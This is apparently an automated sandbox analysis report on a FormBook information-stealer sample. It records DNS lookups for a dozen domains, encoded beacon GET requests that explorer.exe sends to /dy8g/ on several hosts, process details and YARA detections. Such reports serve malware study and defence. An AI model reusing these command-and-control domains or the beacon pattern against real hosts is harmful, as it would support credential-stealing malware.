                                                                      Jul 22, 2021 18:05:05.305864096 CEST53643458.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:16.708476067 CEST5712853192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:16.844685078 CEST53571288.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:24.348808050 CEST5479153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:24.412262917 CEST53547918.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:29.725193024 CEST5046353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:29.798022032 CEST53504638.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:34.991868019 CEST5039453192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:35.301244020 CEST53503948.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:40.347507000 CEST5853053192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:40.408329010 CEST53585308.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:43.520809889 CEST5381353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:43.588076115 CEST53538138.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:44.008579969 CEST6373253192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:44.068742037 CEST53637328.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:45.601917028 CEST5734453192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:45.660773993 CEST53573448.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:50.758366108 CEST5445053192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:50.829539061 CEST53544508.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:56.063550949 CEST5926153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:56.557075024 CEST53592618.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:01.572627068 CEST5715153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:01.782565117 CEST53571518.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:07.533250093 CEST5941353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:07.590384960 CEST53594138.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:08.508938074 CEST6051653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:08.576487064 CEST53605168.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:18.814857960 CEST5164953192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:18.888294935 CEST53516498.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:23.903868914 CEST6508653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:23.966645956 CEST53650868.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:29.368000984 CEST5643253192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:29.558474064 CEST53564328.8.8.8192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jul 22, 2021 18:05:24.348808050 CEST192.168.2.58.8.8.80xc49eStandard query (0)www.cochez.clubA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:29.725193024 CEST192.168.2.58.8.8.80x4939Standard query (0)www.cindywillardrealtor.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:34.991868019 CEST192.168.2.58.8.8.80x7e9dStandard query (0)www.boatrace-life04.netA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:40.347507000 CEST192.168.2.58.8.8.80xbdd4Standard query (0)www.wideawakemomma.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:45.601917028 CEST192.168.2.58.8.8.80x1e19Standard query (0)www.vermogenswerte.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:50.758366108 CEST192.168.2.58.8.8.80x7c2bStandard query (0)www.thenorthgoldline.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:56.063550949 CEST192.168.2.58.8.8.80x8ab6Standard query (0)www.saludflv.infoA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:01.572627068 CEST192.168.2.58.8.8.80x76bcStandard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:07.533250093 CEST192.168.2.58.8.8.80x58f6Standard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:08.508938074 CEST192.168.2.58.8.8.80xa77eStandard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:18.814857960 CEST192.168.2.58.8.8.80x9265Standard query (0)www.livegaming.storeA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:23.903868914 CEST192.168.2.58.8.8.80xb162Standard query (0)www.melodezu.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:29.368000984 CEST192.168.2.58.8.8.80xdcf1Standard query (0)www.garimpeirastore.onlineA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jul 22, 2021 18:05:24.412262917 CEST8.8.8.8192.168.2.50xc49eNo error (0)www.cochez.clubcochez.clubCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:24.412262917 CEST8.8.8.8192.168.2.50xc49eNo error (0)cochez.club95.215.210.10A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:29.798022032 CEST8.8.8.8192.168.2.50x4939No error (0)www.cindywillardrealtor.comcindywillardrealtor.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:29.798022032 CEST8.8.8.8192.168.2.50x4939No error (0)cindywillardrealtor.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:35.301244020 CEST8.8.8.8192.168.2.50x7e9dName error (3)www.boatrace-life04.netnonenoneA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:40.408329010 CEST8.8.8.8192.168.2.50xbdd4No error (0)www.wideawakemomma.comwideawakemomma.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:40.408329010 CEST8.8.8.8192.168.2.50xbdd4No error (0)wideawakemomma.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:45.660773993 CEST8.8.8.8192.168.2.50x1e19No error (0)www.vermogenswerte.comvermogenswerte.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:45.660773993 CEST8.8.8.8192.168.2.50x1e19No error (0)vermogenswerte.com172.104.157.41A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:50.829539061 CEST8.8.8.8192.168.2.50x7c2bNo error (0)www.thenorthgoldline.com825610.parkingcrew.netCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:50.829539061 CEST8.8.8.8192.168.2.50x7c2bNo error (0)825610.parkingcrew.net75.2.81.221A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:56.557075024 CEST8.8.8.8192.168.2.50x8ab6Server failure (2)www.saludflv.infononenoneA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:01.782565117 CEST8.8.8.8192.168.2.50x76bcNo error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:07.590384960 CEST8.8.8.8192.168.2.50x58f6No error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:08.576487064 CEST8.8.8.8192.168.2.50xa77eNo error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:06:08.576487064 CEST8.8.8.8192.168.2.50xa77eNo error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:18.888294935 CEST8.8.8.8192.168.2.50x9265Name error (3)www.livegaming.storenonenoneA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:23.966645956 CEST8.8.8.8192.168.2.50xb162No error (0)www.melodezu.commelodezu.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:06:23.966645956 CEST8.8.8.8192.168.2.50xb162No error (0)melodezu.com64.227.87.162A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:29.558474064 CEST8.8.8.8192.168.2.50xdcf1No error (0)www.garimpeirastore.online209.99.40.222A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.cochez.club
                                                                      • www.cindywillardrealtor.com
                                                                      • www.wideawakemomma.com
                                                                      • www.vermogenswerte.com
                                                                      • www.thenorthgoldline.com
                                                                      • www.extinctionbrews.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.54973495.215.210.1080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:24.568625927 CEST9835OUTGET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.cochez.club
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:24.706911087 CEST9836INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 22 Jul 2021 16:05:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.54973534.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:29.842456102 CEST9837OUTGET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.cindywillardrealtor.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:29.980777979 CEST9837INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:05:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60f790d8-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.54973634.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:40.453010082 CEST9838OUTGET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.wideawakemomma.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:40.590605021 CEST9839INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:05:40 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ef679d-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.549739172.104.157.4180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:45.704566002 CEST9855OUTGET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.vermogenswerte.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:45.750137091 CEST9857INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Thu, 22 Jul 2021 16:05:45 GMT
                                                                      server: LiteSpeed
                                                                      vary: User-Agent
                                                                      Data Raw: 32 37 38 61 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20
                                                                      Data Ascii: 278a<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.54974075.2.81.22180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:50.873647928 CEST9867OUTGET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.thenorthgoldline.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:51.027597904 CEST9869INHTTP/1.1 403 Forbidden
                                                                      Date: Thu, 22 Jul 2021 16:05:51 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.54974334.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:06:08.622399092 CEST9871OUTGET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.extinctionbrews.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:06:08.765433073 CEST9872INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:06:08 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ef6789-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:18:04:32
                                                                      Start date:22/07/2021
                                                                      Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x400000
                                                                      File size:177067 bytes
                                                                      MD5 hash:DE87F1794377537DDA721AFD9137E491
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:04:33
                                                                      Start date:22/07/2021
                                                                      Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x400000
                                                                      File size:177067 bytes
                                                                      MD5 hash:DE87F1794377537DDA721AFD9137E491
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
